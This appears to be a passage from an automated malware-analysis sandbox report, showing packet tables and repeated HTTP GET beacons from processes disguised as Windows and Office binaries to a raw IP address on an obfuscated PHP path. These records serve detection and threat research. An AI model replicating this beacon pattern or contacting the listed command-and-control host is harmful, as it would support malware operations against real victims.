            Aug 28, 2024 15:33:24.217916965 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.812983036 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:24.813154936 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.813226938 CEST5187880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:24.817987919 CEST805187892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.147124052 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.152650118 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.152738094 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.152940035 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.157948971 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.764250040 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.764312029 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.766316891 CEST5188180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.766999960 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.771117926 CEST805188192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.771754026 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:35.771816969 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.771965981 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:35.776727915 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.379072905 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.379420042 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.379465103 CEST5188280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.381973982 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.384301901 CEST805188292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.386862040 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.386929035 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.386970997 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.391758919 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.982460022 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.984644890 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.984939098 CEST5188380192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.984939098 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.989764929 CEST805188392.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.989777088 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:36.989859104 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.989923000 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:36.994739056 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:37.591340065 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:37.591556072 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:37.594690084 CEST5188480192.168.2.692.63.98.227
            Aug 28, 2024 15:33:37.599438906 CEST805188492.63.98.227192.168.2.6
            Aug 28, 2024 15:33:41.554570913 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:41.559531927 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:41.559619904 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:41.559803963 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:41.564646959 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.153708935 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.156568050 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.158231020 CEST5188580192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.158896923 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.163768053 CEST805188592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.164040089 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.164132118 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.164207935 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.169430017 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.765005112 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.765235901 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.788655996 CEST5188680192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.790832043 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.793565035 CEST805188692.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.795722961 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:42.795818090 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.796940088 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:42.802097082 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.410598040 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.410774946 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.411072016 CEST5188780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.411077976 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.416070938 CEST805188792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.416088104 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:43.416171074 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.416255951 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:43.421422958 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:44.007049084 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:44.007271051 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:44.007325888 CEST5188880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:44.012171984 CEST805188892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:57.929131031 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:57.934189081 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:57.934288979 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:57.934411049 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:57.939261913 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.527602911 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.527865887 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.529581070 CEST5188980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.534431934 CEST805188992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.581911087 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.586935997 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:58.587019920 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.587141037 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:58.591903925 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.191356897 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.191452980 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.191539049 CEST5189080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.193588018 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.196368933 CEST805189092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.198497057 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.198590994 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.198673964 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.203918934 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.787250996 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.790381908 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.790524006 CEST5189180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.790947914 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.795351982 CEST805189192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.795861959 CEST805189292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:59.795969009 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.796047926 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:59.800820112 CEST805189292.63.98.227192.168.2.6
            Aug 28, 2024 15:34:00.390815020 CEST805189292.63.98.227192.168.2.6
            Aug 28, 2024 15:34:00.390952110 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:34:00.391047955 CEST5189280192.168.2.692.63.98.227
            Aug 28, 2024 15:34:00.395811081 CEST805189292.63.98.227192.168.2.6

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 28, 2024 15:32:40.587914944 CEST5354615162.159.36.2192.168.2.6
            Aug 28, 2024 15:32:41.284053087 CEST53601691.1.1.1192.168.2.6

            HTTP Request Dependency Graph

            • 92.63.98.227

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.64971692.63.98.227801212C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:19.258656979 CEST731OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.64971792.63.98.227801212C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:19.876547098 CEST731OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.64971892.63.98.227801212C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:20.496839046 CEST731OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.64971992.63.98.227801212C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:21.104700089 CEST731OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1
            Accept: */*
            Content-Type: text/html
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.64972192.63.98.227806320C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:29.113605022 CEST702OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.64972292.63.98.227806320C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:29.723524094 CEST702OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.64972392.63.98.227806320C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:30.347129107 CEST702OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.64972492.63.98.227806320C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:30.967681885 CEST702OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.64972592.63.98.227805764C:\Program Files (x86)\Microsoft.NET\System.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:35.301584005 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.64972692.63.98.227805764C:\Program Files (x86)\Microsoft.NET\System.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:35.902563095 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.64972792.63.98.227805764C:\Program Files (x86)\Microsoft.NET\System.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:36.526133060 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.64972892.63.98.227805764C:\Program Files (x86)\Microsoft.NET\System.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:37.133161068 CEST793OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
            Accept: */*
            Content-Type: text/javascript
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.65185892.63.98.227806316C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:46.886065960 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.65185992.63.98.227806316C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:47.506887913 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.65186092.63.98.227806316C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:48.132966042 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.65186192.63.98.227806316C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe
            TimestampBytes transferredDirectionData
            Aug 28, 2024 15:32:48.735930920 CEST718OUTGET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1
            Accept: */*
            Content-Type: text/csv
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
            Host: 92.63.98.227
